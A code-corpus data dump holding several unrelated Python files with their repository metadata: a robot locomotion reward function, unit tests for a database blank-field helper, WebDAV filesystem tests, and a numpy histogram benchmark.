normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
com_orient_error = 0
foot_orient_error = 0
com_vel_bonus = 0
straight_diff = 0
foot_vel_error = 0
foot_frc_error = 0
# com orient error
com_orient_error += 15 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
# foot orient error
foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
# com vel bonus
com_vel_bonus += com_vel / 3.0
# straight difference penalty
straight_diff = np.abs(qpos[1])
if straight_diff < 0.05:
straight_diff = 0
# height deadzone is +- 0.2 meters
height_diff = np.abs(qpos[2] - 1.0)
if height_diff < 0.2:
height_diff = 0
straight_diff += height_diff
# force/vel clock errors
# These values represent if we want to allow foot foot forces / vels (0 -> don't penalize), or penalize them (1 -> don't allow)
left_frc_clock = self.left_clock[0](self.phase)
right_frc_clock = self.right_clock[0](self.phase)
left_vel_clock = self.left_clock[1](self.phase)
right_vel_clock = self.right_clock[1](self.phase)
left_frc_penalty = np.tanh(left_frc_clock * normed_left_frc)
left_vel_penalty = np.tanh(left_vel_clock * normed_left_vel)
right_frc_penalty = np.tanh(right_frc_clock * normed_right_frc)
right_vel_penalty = np.tanh(right_vel_clock * normed_right_vel)
foot_frc_penalty = left_frc_penalty + right_frc_penalty
foot_vel_penalty = left_vel_penalty + right_vel_penalty
reward = 0.1 * np.exp(-com_orient_error) + \
0.1 * np.exp(-foot_orient_error) + \
0.1 * np.exp(-straight_diff) + \
0.2 * foot_frc_penalty + \
0.2 * foot_vel_penalty + \
0.3 * com_vel_bonus
if self.debug:
print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_penalty: {:.2f}\t t_penalty: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_penalty, foot_frc_penalty))
print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_penalty: {:.2f}\t t_penalty: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_penalty, foot_vel_penalty))
# print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
# print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))
print("reward: {12}\nfoot_orient:\t{0:.2f}, % = {1:.2f}\ncom_vel_bonus:\t{2:.2f}, % = {3:.2f}\nfoot_frc_penalty:\t{4:.2f}, % = {5:.2f}\nfoot_vel_penalty:\t{6:.2f}, % = {7:.2f}\nstraight_diff:\t{8:.2f}, % = {9:.2f}\ncom_orient:\t{10:.2f}, % = {11:.2f}".format(
0.1 * np.exp(-foot_orient_error), 0.1 * np.exp(-foot_orient_error) / reward * 100,
0.3 * com_vel_bonus, 0.3 * com_vel_bonus / reward * 100,
0.2 * foot_frc_penalty, 0.2 * foot_frc_penalty / reward * 100,
0.2 * foot_vel_penalty, 0.2 * foot_vel_penalty / reward * 100,
0.1 * np.exp(-straight_diff), 0.1 * np.exp(-straight_diff) / reward * 100,
0.1 * np.exp(-com_orient_error), 0.1 * np.exp(-com_orient_error) / reward * 100,
reward
)
)
print("actual speed: {}\tcommanded speed: {}\n\n".format(np.linalg.norm(qvel[0:3]), self.speed))
return reward | 50.236473 | 267 | 0.659765 | 4,081 | 25,068 | 3.750551 | 0.045822 | 0.032014 | 0.045734 | 0.027767 | 0.94917 | 0.935777 | 0.922057 | 0.911995 | 0.897426 | 0.888083 | 0 | 0.043432 | 0.209191 | 25,068 | 499 | 268 | 50.236473 | 0.728662 | 0.231411 | 0 | 0.773885 | 0 | 0.082803 | 0.151123 | 0.044482 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015924 | false | 0 | 0.009554 | 0 | 0.041401 | 0.063694 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
97b5465c6925cc1aa7b4810c5c08e725c6d84a62 | 12,649 | py | Python | db_format_helpers/db_format_helpers_tests/test_set_blanks_to_None.py | ThorsteinnAdal/webcrawls_in_singapore_shippinglane | 6f6073c58648407c495931678adb1d584e9105df | [
"Apache-2.0"
] | null | null | null | db_format_helpers/db_format_helpers_tests/test_set_blanks_to_None.py | ThorsteinnAdal/webcrawls_in_singapore_shippinglane | 6f6073c58648407c495931678adb1d584e9105df | [
"Apache-2.0"
] | null | null | null | db_format_helpers/db_format_helpers_tests/test_set_blanks_to_None.py | ThorsteinnAdal/webcrawls_in_singapore_shippinglane | 6f6073c58648407c495931678adb1d584e9105df | [
"Apache-2.0"
] | null | null | null | __author__ = 'thorsteinn'
import unittest
from db_format_helpers.set_blanks_to_None import set_blanks_to_None
from db_format_helpers.list_all_field_values import list_all_field_values
class MyTestCase(unittest.TestCase):
def set_up_db(self):
db = {'ship1': {'key1': u'', 'key2': u'', 'key3': [['ape', 'cloth', 'rand'], [1, 2, 3]], 'key4': ' sometext ', 'key5': 1, 'key6': u'12'},
'ship2': {'key1': 12, 'key2': u'', 'key3': [['ape', 'cloth', 'rand'], [2, 2, 2]], 'key4': ' sometext ', 'key5': 11, 'key6': u'11'},
'ship3': {'key1': u'ab', 'key2': u' \n ', 'key3': [['ape', 'cloth', 'rand'], [3, 2, 3]], 'key4': ' sometext ', 'key5': 0, 'key6': u'0'},
'ship4': {'key1': u' ', 'key2': u'', 'key3': [['ape', 'cloth', 'rand'], [1, 2, 3]], 'key4': ' sometext\n', 'key5': 11.1, 'key6': u'11.1'}}
return db
def test_set_blanks_to_None_default(self):
db = self.set_up_db()
original_key1 = list_all_field_values('key1', db)
original_key2 = list_all_field_values('key2', db)
original_key3 = list_all_field_values('key3', db)
original_key4 = list_all_field_values('key4', db)
original_key5 = list_all_field_values('key5', db)
original_key6 =list_all_field_values('key6', db)
self.assertListEqual(sorted([u'', 12, u'ab', u' ']), sorted(original_key1))
set_blanks_to_None('key1', db)
changed_key1 = list_all_field_values('key1', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([u'', u'', u' \n ', u'']), sorted(original_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(original_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(original_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key2', db)
changed_key2 = list_all_field_values('key2', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(original_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(original_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key3', db)
changed_key3 = list_all_field_values('key3', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(original_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key4', db)
changed_key4 = list_all_field_values('key4', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(changed_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key5', db)
changed_key5 = list_all_field_values('key5', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(changed_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(changed_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key6', db)
changed_key6 =list_all_field_values('key6', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(changed_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(changed_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(changed_key6))
def test_set_blanks_to_None_mayhem(self):
db = self.set_up_db()
original_key1 = list_all_field_values('key1', db)
original_key2 = list_all_field_values('key2', db)
original_key3 = list_all_field_values('key3', db)
original_key4 = list_all_field_values('key4', db)
original_key5 = list_all_field_values('key5', db)
original_key6 =list_all_field_values('key6', db)
self.assertListEqual(sorted([u'', 12, u'ab', u' ']), sorted(original_key1))
set_blanks_to_None('key1', db, trailing_blanks=True)
changed_key1 = list_all_field_values('key1', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([u'', u'', u' \n ', u'']), sorted(original_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(original_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(original_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key2', db, trailing_blanks=True)
changed_key2 = list_all_field_values('key2', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(original_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(original_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key3', db, trailing_blanks=True)
changed_key3 = list_all_field_values('key3', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted([' sometext ', ' sometext ', ' sometext ', ' sometext\n']), sorted(original_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key4', db, trailing_blanks=True)
changed_key4 = list_all_field_values('key4', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted(['sometext', 'sometext', 'sometext', 'sometext']), sorted(changed_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(original_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key5', db, trailing_blanks=True)
changed_key5 = list_all_field_values('key5', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted(['sometext', 'sometext', 'sometext', 'sometext']), sorted(changed_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(changed_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(original_key6))
set_blanks_to_None('key6', db, trailing_blanks=True)
changed_key6 =list_all_field_values('key6', db)
self.assertListEqual(sorted([None, 12, u'ab', None]), sorted(changed_key1))
self.assertListEqual(sorted([None, None, None, None]), sorted(changed_key2))
self.assertListEqual(sorted([[['ape', 'cloth', 'rand'], [1, 2, 3]],
[['ape', 'cloth', 'rand'], [2, 2, 2]],
[['ape', 'cloth', 'rand'], [3, 2, 3]],
[['ape', 'cloth', 'rand'], [1, 2, 3]]]), sorted(changed_key3))
self.assertListEqual(sorted(['sometext', 'sometext', 'sometext', 'sometext']), sorted(changed_key4))
self.assertListEqual(sorted([1, 11, 0, 11.1]), sorted(changed_key5))
self.assertListEqual(sorted([u'12', u'11', u'0', u'11.1']), sorted(changed_key6))
if __name__ == '__main__':
unittest.main()
| 68.005376 | 153 | 0.540991 | 1,513 | 12,649 | 4.353602 | 0.038334 | 0.213451 | 0.280856 | 0.071049 | 0.949142 | 0.92971 | 0.917109 | 0.917109 | 0.917109 | 0.917109 | 0 | 0.057951 | 0.25923 | 12,649 | 185 | 154 | 68.372973 | 0.645037 | 0 | 0 | 0.834356 | 0 | 0 | 0.126967 | 0 | 0 | 0 | 0 | 0 | 0.453988 | 1 | 0.018405 | false | 0 | 0.018405 | 0 | 0.04908 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
97cf72c243f234b280cf434df26e34f5b5323ea5 | 7,950 | py | Python | cerulean/test/test_webdav_file_system.py | MD-Studio/cerulean | e081f0242494890e26b5ec5e150187c1f130477f | [
"Apache-2.0"
] | 5 | 2019-02-12T01:39:24.000Z | 2020-08-26T12:59:46.000Z | cerulean/test/test_webdav_file_system.py | MD-Studio/cerulean | e081f0242494890e26b5ec5e150187c1f130477f | [
"Apache-2.0"
] | 12 | 2018-11-04T19:11:23.000Z | 2019-09-26T14:19:36.000Z | cerulean/test/test_webdav_file_system.py | MD-Studio/cerulean | e081f0242494890e26b5ec5e150187c1f130477f | [
"Apache-2.0"
] | 2 | 2019-09-27T11:24:04.000Z | 2020-04-28T07:04:04.000Z | from typing import Dict
import pytest
from cerulean import (
EntryType, PasswordCredential, Permission, UnsupportedOperationError,
WebdavFileSystem)
from cerulean.path import AbstractPath
def test_creating_http() -> None:
with WebdavFileSystem('http://cerulean-test-webdav/files') as f:
assert (f / '').is_dir()
def test_creating_http_password() -> None:
credential = PasswordCredential('cerulean', 'kingfisher')
with WebdavFileSystem('http://cerulean-test-webdav/protected_files',
credential) as f:
assert (f / '').is_dir()
def test_creating_https() -> None:
with WebdavFileSystem('https://cerulean-test-webdav/files',
host_ca_cert_file='/home/cerulean/cerulean_webdav.crt'
) as f:
assert (f / '').is_dir()
def test_creating_https_password() -> None:
credential = PasswordCredential('cerulean', 'kingfisher')
with WebdavFileSystem('https://cerulean-test-webdav/protected_files',
credential,
host_ca_cert_file='/home/cerulean/cerulean_webdav.crt'
) as f:
assert (f / '').is_dir()
# Test handling of unsupported features
def test_entry_types(webdav_filesystem_raises: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_raises
lpaths = lpaths_webdav_raises
assert filesystem._entry_type(lpaths['link']) == EntryType.FILE
with pytest.raises(FileNotFoundError):
filesystem._entry_type(lpaths['blockdev'])
with pytest.raises(FileNotFoundError):
filesystem._entry_type(lpaths['fifo'])
assert filesystem._is_file(lpaths['link'])
assert not filesystem._is_file(lpaths['blockdev'])
assert not filesystem._is_file(lpaths['fifo'])
assert not filesystem._is_dir(lpaths['link'])
assert not filesystem._is_dir(lpaths['blockdev'])
assert not filesystem._is_dir(lpaths['fifo'])
def test_owner(webdav_filesystem_raises: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_raises
lpaths = lpaths_webdav_raises
assert filesystem._uid(lpaths['root']) == 0
assert filesystem._gid(lpaths['root']) == 0
def test_has_permission(webdav_filesystem_raises: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_raises
lpaths = lpaths_webdav_raises
file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
for permission in dir_permissions:
assert filesystem._has_permission(lpaths['root'], permission)
for permission in file_permissions:
assert filesystem._has_permission(lpaths['file'], permission)
def test_set_permission(webdav_filesystem_raises: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_raises
lpaths = lpaths_webdav_raises
with pytest.raises(UnsupportedOperationError):
filesystem._set_permission(lpaths['root'], Permission.OTHERS_READ,
False)
def test_chmod(webdav_filesystem_raises: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_raises
lpaths = lpaths_webdav_raises
with pytest.raises(UnsupportedOperationError):
filesystem._chmod(lpaths['root'], 0o0755)
def test_symlink_to(webdav_filesystem_raises: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_raises
lpaths = lpaths_webdav_raises
with pytest.raises(UnsupportedOperationError):
filesystem._symlink_to(lpaths['new_file'], lpaths['file'])
def test_readlink(webdav_filesystem_raises: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_raises
lpaths = lpaths_webdav_raises
with pytest.raises(IOError):
filesystem._readlink(lpaths['link'], False)
with pytest.raises(IOError):
filesystem._readlink(lpaths['link'], True)
def test_entry_types2(webdav_filesystem_quiet: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_quiet
lpaths = lpaths_webdav_raises
assert filesystem._entry_type(lpaths['link']) == EntryType.FILE
with pytest.raises(FileNotFoundError):
filesystem._entry_type(lpaths['blockdev'])
with pytest.raises(FileNotFoundError):
filesystem._entry_type(lpaths['fifo'])
assert not filesystem._exists(lpaths['blockdev'])
assert filesystem._is_file(lpaths['link'])
assert not filesystem._is_file(lpaths['blockdev'])
assert not filesystem._is_file(lpaths['fifo'])
assert not filesystem._is_dir(lpaths['link'])
assert not filesystem._is_dir(lpaths['blockdev'])
assert not filesystem._is_dir(lpaths['fifo'])
def test_owner2(webdav_filesystem_quiet: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_quiet
lpaths = lpaths_webdav_raises
assert filesystem._uid(lpaths['root']) == 0
assert filesystem._gid(lpaths['root']) == 0
def test_has_permission2(webdav_filesystem_quiet: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]
) -> None:
filesystem = webdav_filesystem_quiet
lpaths = lpaths_webdav_raises
file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
for permission in dir_permissions:
assert filesystem._has_permission(lpaths['root'], permission)
for permission in file_permissions:
assert filesystem._has_permission(lpaths['file'], permission)
def test_set_permission2(
webdav_filesystem_quiet: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_quiet
lpaths = lpaths_webdav_raises
filesystem._set_permission(lpaths['root'], Permission.OTHERS_READ, True)
file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
for permission in dir_permissions:
assert filesystem._has_permission(lpaths['root'], permission)
def test_chmod2(webdav_filesystem_quiet: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_quiet
lpaths = lpaths_webdav_raises
filesystem._chmod(lpaths['root'], 0o0755)
file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
for permission in dir_permissions:
assert filesystem._has_permission(lpaths['root'], permission)
def test_symlink_to2(webdav_filesystem_quiet: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_quiet
lpaths = lpaths_webdav_raises
filesystem._symlink_to(lpaths['new_file'], lpaths['file'])
assert not filesystem._exists(lpaths['new_file'])
def test_readlink2(webdav_filesystem_quiet: WebdavFileSystem,
lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
filesystem = webdav_filesystem_quiet
lpaths = lpaths_webdav_raises
# raises anyway, since the resource is not a symlink, those don't exist
with pytest.raises(IOError):
filesystem._readlink(lpaths['link'], False)
with pytest.raises(IOError):
filesystem._readlink(lpaths['link'], True)
| 38.221154 | 80 | 0.712327 | 852 | 7,950 | 6.340376 | 0.109155 | 0.082932 | 0.093299 | 0.088116 | 0.919289 | 0.901148 | 0.868197 | 0.868197 | 0.811551 | 0.805998 | 0 | 0.00328 | 0.194591 | 7,950 | 207 | 81 | 38.405797 | 0.840387 | 0.013459 | 0 | 0.746667 | 0 | 0 | 0.059439 | 0.008673 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.12 | false | 0.033333 | 0.026667 | 0 | 0.146667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c158fc283466aacb3d6518281f64160a6e4379ad | 3,845 | py | Python | src/westpa/fasthist/__main__.py | burntyellow/adelman_ci | cca251a51b34843faed0275cce01d7a307829993 | [
"MIT"
] | 140 | 2015-01-07T23:30:36.000Z | 2022-03-28T17:15:30.000Z | lib/west_tools/fasthist/__main__.py | burntyellow/westpa | 9dc62478fcef0001b9c038cd56a40b6be1b9d64a | [
"MIT"
] | 157 | 2015-01-03T03:38:36.000Z | 2022-03-31T14:12:16.000Z | lib/west_tools/fasthist/__main__.py | burntyellow/westpa | 9dc62478fcef0001b9c038cd56a40b6be1b9d64a | [
"MIT"
] | 56 | 2015-01-02T21:21:40.000Z | 2022-03-03T16:27:54.000Z | '''
Created on Jun 25, 2013
@author: mzwier
'''
import numpy
from fasthist import histnd
def _test_double(npts=1024*1024,loops=3):
from time import time
mine_times = [None]*loops
theirs_times = [None]*loops
# though 1.0 should be sufficient, weirdness in the boundary conditions
# for numpy.digitize appears to introduce a discrepancy, so throw something
# greater than 1.0 in for good measure
binbounds = [[0,0.5,1,1.1] for x in range(3)]
weights = numpy.random.rand(npts)
#weights = numpy.ones((npts,), dtype=numpy.float64)
for n in range(loops):
testdat = numpy.random.rand(npts,3)
mstart = time()
mine = histnd(testdat, binbounds, weights=weights)
mstop = time()
tstart = time()
theirs = numpy.histogramdd(testdat, binbounds, weights=weights)[0]
tstop = time()
mine_times[n] = mstop-mstart
theirs_times[n] = tstop-tstart
print(mine)
print(theirs)
errsum = numpy.abs(mine-theirs).sum()
errsum_per_item = errsum / npts
rel_err = errsum / numpy.abs(weights).sum()
print('sum of the absolute errors: {} ({} relative, {} per entry)'.format(errsum, rel_err, errsum_per_item))
print('mine, best of {}: {}'.format(loops, min(mine_times)))
print('theirs, best of {}: {}'.format(loops, min(theirs_times)))
def _test_float(npts=1024*1024,ndim=3,loops=3):
from time import time
mine_times = [None]*loops
theirs_times = [None]*loops
binbounds = [[0,0.5,1,1.1] for x in range(ndim)]
#weights = numpy.random.rand(npts)
weights = numpy.ones((npts,), dtype=numpy.float64)
for n in range(loops):
testdat = numpy.require(numpy.random.rand(npts,ndim), numpy.float32)
print(testdat)
mstart = time()
mine = histnd(testdat, binbounds, weights=weights)
mstop = time()
tstart = time()
theirs = numpy.histogramdd(testdat, binbounds, weights=weights)[0]
tstop = time()
mine_times[n] = mstop-mstart
theirs_times[n] = tstop-tstart
print(mine)
print(theirs)
errsum = numpy.abs(mine-theirs).sum()
errsum_per_item = errsum / npts
rel_err = errsum / numpy.abs(weights).sum()
print('sum of the absolute errors: {} ({} relative, {} per entry)'.format(errsum, rel_err, errsum_per_item))
print('mine, best of {}: {}'.format(loops, min(mine_times)))
print('theirs, best of {}: {}'.format(loops, min(theirs_times)))
def _test_uint(npts=1024*1024,ndim=3,loops=3):
from time import time
mine_times = [None]*loops
theirs_times = [None]*loops
binbounds = [[0,1,2,3,4] for x in range(ndim)]
#weights = numpy.random.rand(npts)
weights = numpy.ones((npts,), dtype=numpy.float64)
print('binbounds: {}'.format(binbounds))
print('weights')
print(weights)
for n in range(loops):
testdat = numpy.require(numpy.random.randint(0,4,size=(npts,ndim)), numpy.uint16)
print('test data')
print(testdat)
mstart = time()
mine = histnd(testdat, binbounds, weights=weights)
mstop = time()
tstart = time()
theirs = numpy.histogramdd(testdat, binbounds, weights=weights)[0]
tstop = time()
mine_times[n] = mstop-mstart
theirs_times[n] = tstop-tstart
print(mine)
print(theirs)
errsum = numpy.abs(mine-theirs).sum()
errsum_per_item = errsum / npts
rel_err = errsum / numpy.abs(weights).sum()
print('sum of the absolute errors: {} ({} relative, {} per entry)'.format(errsum, rel_err, errsum_per_item))
print('mine, best of {}: {}'.format(loops, min(mine_times)))
print('theirs, best of {}: {}'.format(loops, min(theirs_times)))
_test_float(npts=1024*1024,ndim=1) | 36.971154 | 116 | 0.622887 | 508 | 3,845 | 4.627953 | 0.183071 | 0.030625 | 0.033177 | 0.076563 | 0.835815 | 0.835815 | 0.823054 | 0.823054 | 0.823054 | 0.823054 | 0 | 0.027891 | 0.235371 | 3,845 | 104 | 117 | 36.971154 | 0.771769 | 0.087906 | 0 | 0.790123 | 0 | 0 | 0.095851 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.061728 | 0 | 0.098765 | 0.259259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1b124c1194983eeec4419eca29081105a0a4323 | 5,476 | py | Python | biserici_inlemnite/biserici/migrations/0018_auto_20210731_0202.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | biserici_inlemnite/biserici/migrations/0018_auto_20210731_0202.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
